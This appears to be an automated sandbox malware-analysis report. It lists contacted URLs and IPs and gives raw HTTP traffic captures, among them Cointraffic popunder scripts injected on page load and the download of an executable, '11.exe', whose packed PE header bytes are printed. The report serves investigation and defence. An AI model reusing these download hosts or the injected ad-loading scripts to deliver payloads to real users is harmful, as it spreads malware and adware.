hxxp://up.video.iqiyi.com/ugc-updown/quud.do?dataid=572044000&type=2&userid=&flashuid=5088e17771f6d54476f95dc61f9e80b4&appID=21&callback=window.Q.__callbacks__.cbrokkg9	123.125.111.84
hxxp://cltres.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://b.scorecardresearch.com/beacon.js	217.212.238.42
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=jingyitest1&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&ver=WIN 23,0,0,185&yhls=1485764902188&pla=11&mod=cn_s&tn=0.6147289201617241	106.38.219.49
hxxp://www.iqiyi.com/common/flashplayer/20170119/1050c72eeb6.swf
hxxp://www.iqiyi.com/common/flashplayer/20161122/1823925a82d4.swf
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22608113	106.11.93.16
hxxp://cache.video.qiyi.com/jp/vi/572044000/787ab6983c8a883fa3c5190ce3cac804/?status=1&callback=window.Q.__callbacks__.cb2r2oc2	106.38.219.21
hxxp://static.iqiyi.com/js/qiyiV2/20170119180153/jobs/pc/ugcBodanPlay.js
hxxp://cmts.iqiyi.com/crossdomain.xml	119.188.145.8
hxxp://mixer.video.iqiyi.com/jp/recommend/videos?referenceId=572044000&albumId=0&cookieId=o5rodndzg8of8s4mwfefai5c&channelId=10&withRefer=false&area=swan&size=10&type=video&trimUser=false&pru=&playPlatform=PC_QIYI&callback=window.Q.__callbacks__.cbg39tfk	106.38.219.21
hxxp://static.iqiyi.com/js/pingback/qa.js
hxxp://msg.71.am/core?t=15&ptid=11&pf=1&p=10&p1=101&c1=10&r=572044000&aid=204432001&u=5088e17771f6d54476f95dc61f9e80b4&pu=&v=3.3.12.9&ra=2&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&ce=11d91127a84babbf6dabdf9e702b5f03&ve=0418909173dcc97c13d68d5c2ee32172&vfrm=&vfrmtp=manclick&sdktp=1&hu=&ht=0&mod=cn_s&islocal=0&rfr=&lrfr=DIRECT&rn=0.6126211592927575	106.38.219.49
hxxp://msg.71.am/cp2.gif?x=http://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf\|\|http://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf&p=v&lc=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&s=1484906112396&t=s&b=0&c=0&v=572044000&av=AdManager 3.63.0&fp=WIN 23,0,0,185&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&y=qc_100001_100226&pl=0	106.38.219.49
hxxp://atanx2.alicdn.com/g/mm/tanx-cdn2/t/tanxssp.js?_v=12	195.27.31.250
hxxp://cpro.baidu.com/cpro/ui/html/sync.htm?sid=&p=iqiyi&t=1484906112271	115.239.217.134
hxxp://data.video.qiyi.com/crossdomain.xml	222.173.57.193
hxxp://msg.video.qiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906111480	36.110.220.15
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=svrs&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=b7ec007eeb7742d5c4f169def66e0c67&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.11122033419087529	106.38.219.49
hxxp://hm.baidu.com/hm.js?53b7374a63c37483e5dd97d78d9bb36e	220.181.7.190
hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf
hxxp://static.iqiyi.com/ext/common/Tipdatavod_201610311735.xml?n=0.2173128924332559
hxxp://pixel.quantserve.com/pixel;r=995029119;a=p-pV8razYeGyZwj;fpan=0;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=	95.172.94.59
hxxp://msg.video.qiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906109847	36.110.220.15
hxxp://hm.baidu.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&ep={"netAll":1466,"netDns":1383,"netTcp":79,"srv":583,"dom":2056,"loadEvent":6899,"qid":"","bdDom":0,"bdRun":0,"bdDef":0}&et=87&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=2074899456&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1	220.181.7.190
hxxp://static.geetest.com/static/js/geetest.5.10.0.js	198.11.176.80
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22350506	106.11.93.16
hxxp://msg.71.am/cp2.gif?s=1484906112427&t=s&av=3.12.0&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&rd=1509&y=qc_100001_100226&p=pl&rc=1	106.38.219.49
hxxp://msg.iqiyi.com/vpb.gif?flag=rptusr&newusr=1&suid=5088e17771f6d54476f95dc61f9e80b4&tn=0.5403782017529011	106.38.219.49
hxxp://meta.video.qiyi.com/crossdomain.xml	2.21.89.89
hxxp://passport.pps.tv/pages/user/proxy.action	123.125.111.87
api.share.baidu.com	61.135.162.115
googleads.g.doubleclick.net	173.194.113.218
ap1.sap1000.com	61.153.110.5

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /pupfurt.js HTTP/1.1

Accept: */*

Referer: hXXp://zooxxxfree.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: hitslap.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Server: Apache/2.4.10 (Debian)

Last-Modified: Mon, 10 Nov 2014 19:45:40 GMT

ETag: "17e2-5078668464100-gzip"

Accept-Ranges: bytes

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 1893

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/javascript

...........X.o.6..._.....U..b.N.....@?...V.A@K..E.5.r.4..wGR...IZ.a......x.....U.k!sZT..l.uoo....<{..|.\........Y.$`erH...Rzo..A..s...D...=..f9...~..z#..dN.1...LJE..Wk...e...E&4].....b....'n28...d...&1...P."..i.u.r..gs.vuE.2.h..!.R@.y0...S..z.{..9eHDH....T..DJ(.x.d.6.hE.'......y..2V2.A9..2.$h."...LW%......&.Kq....O.s...<..E..G.D..k.!.....6ke...r..e..7...Ta.z2P.9|.*.<sc.`.G.`ey......lt....!)...2...g.y8H....."*.F....{BK.........e=cz./..7.....O.i..p..8.f..KO.a*.....*...!...(.....x.1.L....r..!Y...%.;3.....,I~...[Qj.sE..^.A....de!y...<Z.Y.2.4.yC8......DE..R.,...qU.\..K\p..g...f\D).0....C..3.|q&4Nl.......s0Yiz{...Jv/*$S.....o.eGEtO.*?P...3....../Zx....L..._.vPD.tCW.\...Cp.............9$L....z...,|.)......B..N.t;|6...^DAVp....Ol.U....lM..X..H.V"K..u.z>....w.*.s..!.z#t..F..).M.[nb....!qd...,.;.Q"....r..\......G.......k..>...T=.N......).F.........Ai..$.d23<..5........X....R.t..`s\...yT...........{i..:.{k..4W..&E...v.4.m....mg...d.gc.Z>..q&.2.j.e..(.9O.m..o.Y..........L..^.nf.[f.5....5..k>y.??N..8...IJ......e.G..d.....m..W...'..NO..I.d......9..%.RE.(...]P.....#.1}...w.#...gdl.......8. ..Rd..r...cl<..X.!.... .pt..x....C.p.|.*(...$CRV....l...t.}.R.......{)l...].n"...q.\G..J.......8...3..G...L........./Itr0.....O.!.......5.R.J.[.A.l.%u9z.....b~..{p...z..P.ko6y-/n.k.......}/4.....,'P....#S.<...*SD'A;....V"Ix......7.v...Wq.V.ge.t,.W......~...!f_d..g.N.T*B.L.-. ..vH..R.`....E...8A.=.h.`"0.g.......R)LY.<.A.=._S.:9 p..{e.I...pw.o.et.Q.{.i.r..~S...|.4r`..:..S.i...6.j. .....F......]*.?q....C....

<<< skipped >>>

GET /js/?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

1b0../* Cointraffic.io */..(function () {..var ct_load = function(){..var ct_script = document.createElement('script');..ct_script.type = "text/javascript";..ct_script.src = "//apps.cointraffic.io/bnr?wkey=10E7Cr";..document.getElementsByTagName('head')[0].appendChild(ct_script);..};..if (window.addEventListener) {..window.addEventListener('load', ct_load, false);..} else {..window.attachEvent('onload', ct_load)..}..}());.. ..0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:18 GMT..Content-Type: application/javascript..Transfer-Encoding: chunked..Connection: keep-alive..1b0../* Cointraffic.io */..(function () {..var ct_load = function(){..var ct_script = document.createElement('script');..ct_script.type = "text/javascript";..ct_script.src = "//apps.cointraffic.io/bnr?wkey=10E7Cr";..document.getElementsByTagName('head')[0].appendChild(ct_script);..};..if (window.addEventListener) {..window.addEventListener('load', ct_load, false);..} else {..window.attachEvent('onload', ct_load)..}..}());.. ..0......

GET /bnr?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/html

Content-Length: 178

Location: hXXp://apps.cointraffic.io/bnr/?wkey=10E7Cr

Connection: keep-alive

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>......

GET /bnr/?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/javascript;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

cf6../* 4 not allowed for this device */ ../* Cointraffic.io | Load Popunder */..var scr_js = document.createElement('script');..scr_js.src = "//app.cointraffic.in/js/pnd2/script.packed.js";..document.getElementsByTagName('head')[0].appendChild(scr_js);..setTimeout(function() {..function get_f_popuner() {..var rurl = '//apps.cointraffic.io/clkrd/?bid=600';..BetterJsPop.add( rurl , {..noReferer: true,..newTab: true,..under: false,..device: 'desktop',..cookieExpires: 1800,..afterOpen: function(url, options, popWin) {..load_cr_34BWiR();..}}); function load_cr_34BWiR() {..var css_copyright = document.createElement('link');..css_copyright.rel = "stylesheet";..css_copyright.type = "text/css";..css_copyright.href = "//apps.cointraffic.io/css_cr/ppunder/?key=34BWiR&b=600";..document.getElementsByTagName('head')[0].appendChild(css_copyright);..}} window.onload = get_f_popuner(); }, 1000);../* Cointraffic.io | Load Slide */..if(typeof(Storage) !== "undefined") {.. if (sessionStorage.ct_ss_chk_zGLVXy) {.. sessionStorage.ct_ss_chk_zGLVXy = Number(sessionStorage.ct_ss_chk_zGLVXy) 1;.. } else {.. var css_zGLVXy = document.createElement('link');.. css_zGLVXy.rel = "stylesheet";.. css_zGLVXy.type = "text/css";.. css_zGLVXy.href = "//apps.cointraffic.io/css/slide/?key=zGLVXy";.. document.getElementsByTagName('head')[0].appendChild(css_zGLVXy);.. // document.body.innerHTML = '<span id="ct_zGLVXy"></span>';.... var btn = document.createElement('span');..

<<< skipped >>>

GET /css/slide/?key=zGLVXy HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/css;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

51e..@-webkit-keyframes bounce {.. 0%, 20%, 50%, 80%, 100% {-webkit-transform: translateY(0);}.. 40% {-webkit-transform: translateY(-30px);}.. 60% {-webkit-transform: translateY(-15px);}..}..@keyframes bounce {.. 0%, 20%, 50%, 80%, 100% {transform: translateY(0);}.. 40% {transform: translateY(-30px);}.. 60% {transform: translateY(-15px);}..}...ct_zGLVXyl {.. position: fixed;.. left:0;.. bottom:0;.. display: block;.. z-index: 9999;..}...ct_zGLVXyr {.. position: fixed;.. right:0;.. bottom:0;.. display: block;.. z-index: 999;..}...ct_zGLVXyl .ct_zGLVXycrs {.. display: block;.. position: absolute;.. right: -20px;.. top: -20px;.. height: 20px;.. width: 20px;..}...ct_zGLVXyr .ct_zGLVXycrs {.. display: block;.. position: absolute;.. left: -20px;.. top: -20px;.. height: 20px;.. width: 20px;..}...ct_zGLVXyr .ct_zGLVXycrs img {.. height: 20px;.. width: 20px;..}...ct_zGLVXycrs:hover {.. cursor: pointer;..}...ct_zGLVXybnc {.. -webkit-animation-duration: 1s;.. animation-duration: 1s;.. -webkit-animation-fill-mode: both;.. animation-fill-mode: both;.. -webkit-animation-timing-function: linear;.. animation-timing-function: linear;.. -webkit-animation-name: bounce;.. animation-name: bounce;..}..0......

GET /css_cr/slide/?key=zGLVXy&b=601 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:25 GMT

Content-Type: text/css;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

478...ct_zGLVXylg {.. position: absolute;.. top: 0;.. right: 0;.. height: 15px;.. width: 15px;.. display: block !important;.. z-index: 9999;..}...ct_zGLVXylg img.ct_zGLVXyimg {.. position: absolute;.. top: 0;.. right: 0;.. margin: 0;.. padding: 0;..}...ct_zGLVXytx {.. visibility: hidden;.. opacity: 0;.. transition: visibility 0s, opacity 0.5s linear;.. color: #000 !important;.. font-family: Verdana;.. background: #fff !important;.. font-size:10px !important;.. position:absolute !important;.. top: 0 !important;.. right: 15px !important;.. width: 110px !important;.. text-align: center;.. height: 15px !important;.. line-height: 14px !important;.. padding: 0 !important;.. -webkit-transition: all 0.5s ease;.. -moz-transition: all 0.5s ease;.. -o-transition: all 0.5s ease;..}...ct_zGLVXytx a.ct_zGLVXylnk {.. line-height: 14px !important;.. font-size:10px !important;.. font-family: Verdana;.. color: #000 !important;.. text-decoration: none !important;..}...ct_zGLVXylg:hover .ct_zGLVXytx {.. visibility: visible;.. opacity: 1;..}..0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:25 GMT..Content-Type: text/css;charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..478...ct_zGLVXylg {.. position: absolute;.. top: 0;.. right: 0;.. height: 15px;.. width: 15px;.. display: block !important;.. z-index: 9999;..}...ct_zGLVXylg img.ct_zGLVXyimg {.. position: absolute;..

<<< skipped >>>

GET /m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: search.video.qiyi.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 372

Connection: keep-alive

Access-Control-Allow-Credentials: true

try{window.Q.__callbacks__.cbtskh2b({. "data": [. {. "query": "..................... ...2...",. "impression_count": 12062,. "click_count": 15055,. "url": "http://so.iqiyi.com/so/q_..................... ...2...",. "search_trend": 1,. "weight": 1. }. ],. "code": "A00000".})}catch(e){}HTTP/1.1 200 OK..Server: Tengine..Date: Fri, 20 Jan 2017 09:55:16 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 372..Connection: keep-alive..Access-Control-Allow-Credentials: true..try{window.Q.__callbacks__.cbtskh2b({. "data": [. {. "query": "..................... ...2...",. "impression_count": 12062,. "click_count": 15055,. "url": "hXXp://so.iqiyi.com/so/q_..................... ...2...",. "search_trend": 1,. "weight": 1. }. ],. "code": "A00000".})}catch(e){}..

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0

HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:13 GMT

Cache-Control: no-cache

0..

GET /ics?a=194.242.96.218&b=9b9366963d49845dcaef1cf22d487ad8 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: 101.227.188.34

Connection: Keep-Alive

HTTP/1.1 204 No Content

Server: nginx/1.4.2

Date: Fri, 20 Jan 2017 09:55:15 GMT

Connection: keep-alive

HTTP/1.1 204 No Content..Server: nginx/1.4.2..Date: Fri, 20 Jan 2017 09:55:15 GMT..Connection: keep-alive..

GET /date/11.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: update-10042197.cos.myqcloud.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Range: bytes 0-370175/370176

Content-Type: application/octet-stream

Content-Disposition: attachment; filename*="UTF-8''11.exe"

Content-Language: zh-CN

ETag: 9eb7e6738239615838c9e6d786336d13

Accept-Ranges: bytes

Last-Modified: Wed, 07 Dec 2016 20:26:00 GMT

Content-Length: 370176

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...mio.mio.mio.....hio..'..lio.v...qio.d...`io.d...Fio.min.:ho.v....io.v....io.v...lio.mi..lio.v...lio.Richmio.........PE..L...$N.W..................... ......`........ ....@..........................@............@..................................7....... ......................T<......................................................................................UPX0....................................UPX1................................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....B..noNCm....[....:..&>.=....U...E...h......P.>..../......t,...t ..t."t.P....t.h.@......hW.....h...].....n.u........H.....z..=.r.m.]1....R..u.(VP....._....t(?\.M......v.;.s.I....o...tV.u..r.3... .....#.^..{.......@*.j.P..k....%..._..6.RePj.d...BSVW...H@j....~.|...3.C..gWR..|.....S?C...6._^[~........p.}..v......M...@'....w.D.A........J........Q...R.o..._D..h..i....Y@P.JL...]....W..@.\fV....!..[.....t.V...Y.l........x...;B....B...3.f......A?.......si.........c9..E=.r..O...kQQ..1.^..M....~.N..W.]..Pp.j.l......u....B;.}.......

<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=55_1484906106204537_27019&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343931&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|

HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip

2f1.............T]..6.. n*.V*$v.H [....m...}.Ll...v..,..w..../............;.;w3..n.....){...Q.....5...W..q..a......&y..hw>Y}Ql.i.m..O.g..jOB......P..%[`a..u..c...../Z9*.......;7.U(..km....w..ql..Yz<..........6....V....(H.n.................6._...la.f..x)M..-...........u..XH.|.........E...E./......(Y..22...$.H......(.(........%%.....v...1...`E..f.$..z..U..7.......K\.....p.|$ ..s:..=iI..<.^.s.4..$......^{}.A...@..,......>....k.9o_>=.@,h.fx..E..&.Uy..kVK1.(]..8.dUR.. I..eK..WKj..j...zh!.u~.q..{.].s}..$1.[.sq.].H..F....jd..N..-..v.mj.P..-.o........quo.......Q........w(...... .Y......vb8..vM.[j......).&p.-..|c....=...;..NJ..#5e...^.u........P........Hz..P.n.. uw..b.'.{...7......Hjm@.....8......H.-.....`....4O.8...M.BEs.....G..[)_.8...-............u........0..

GET /ads?spot_id=2007013&rand=1853651284&impid=50_1484906106729452_21376&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344051&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|

HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip

2f2.............Tm..8.. .T.=. ..F.....E...:.....xIl.1.........R..B.x...3....Tc.......fzr..7=..5-5..Up...*......)vE..v..v.9..:I.hT.L..D..F=5.!.h.4eL.C..5.0qFMG.....q.NIK..&@J6.h.Up....Ri......2..]ZC.{.<.......V...SV.Ve.d.....yR.......m...e.qs..$.&.m.....NW..,~.....\.Ks\6..EG..........7.?P6..9!E....%3.QFF......=.......%..tr.S..(..P<...c.0.Y..,...l..p[.x....*wP<...m...........D.c....#......k[....]....p...V... kz.k;........_.............v`.Wi.....W.'..j1.....Q..URD.....IJj..<.S.......].1.........".mK.G.~Y...CkKDR..j.V(Y".;j...Qs2.kS......:s....D.`..[.N........,pX..........}]@....<...........R.4..u.0......w.k...!4..2x...Q...;E.?...Z..[...np%.....5bb....H..n.b....j..N...~.o..'H..Q...).P.w.|...g."....}L..N..&.4!B..RW...L...P..6.Z)W..................V........0..

GET /ex?i=mm_26632162_2469125_22350506 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: p.tanx.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: close

Server: Tengine

Vary: Accept-Encoding

Expires: Fri, 20 Jan 2017 09:55:08 GMT

Cache-Control: no-cache

Content-Encoding: gzip

Timing-Allow-Origin: *

1c6............].M..0.@...t.."8.,.%...]..*8t.V....!.:vd;."....=.^F3........sB ..J||......B.l..d...l..M>..x.e.q2N&.1*...?S.....2d:.*....P..8.^...D...5.$..>M.;....K.....4=Gm.....[..3...0..@.v.4x3B.`...x.7M....._...txA...f....[!y|u.`mK..l.R.........\ThO....6?.....M.4..w.Q.7.\|_>|)..N..:..I..:\.....{.......Jt.eH.0@....O....EI.....~....:.Q].....Dw..p.5.%.U..-a55...:W.?.'... .'>...m^...R..W.pd..T.X.....g.-?.do......~.?o/..?h.}...:b......g..B...9..0,....;..@......0..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: irs01.com

Connection: Keep-Alive

Cookie: _iwt_id=qrIman_egVifaJSxR1USTgA

HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/xml; charset=utf-8

Content-Length: 165

Last-Modified: Thu, 19 Nov 2015 03:19:21 GMT

Connection: close

Vary: Accept-Encoding

ETag: "564d3fb9-a5"

Content-Encoding: gzip

Expires: Fri, 27 Jan 2017 09:55:14 GMT

Cache-Control: max-age=604800

.....?MV..crossdomain.xml.m....0.E....f)..}b.%$#.H25._.oJ.H.]..... '...X......e...Jk.%{.8K......X......L5.*E..L..O..5.S..C..^.d....`~.Iu.J.;5..|..6../{................

GET /js/pnd2/script.packed.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: app.cointraffic.in

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: application/javascript

Content-Length: 65792

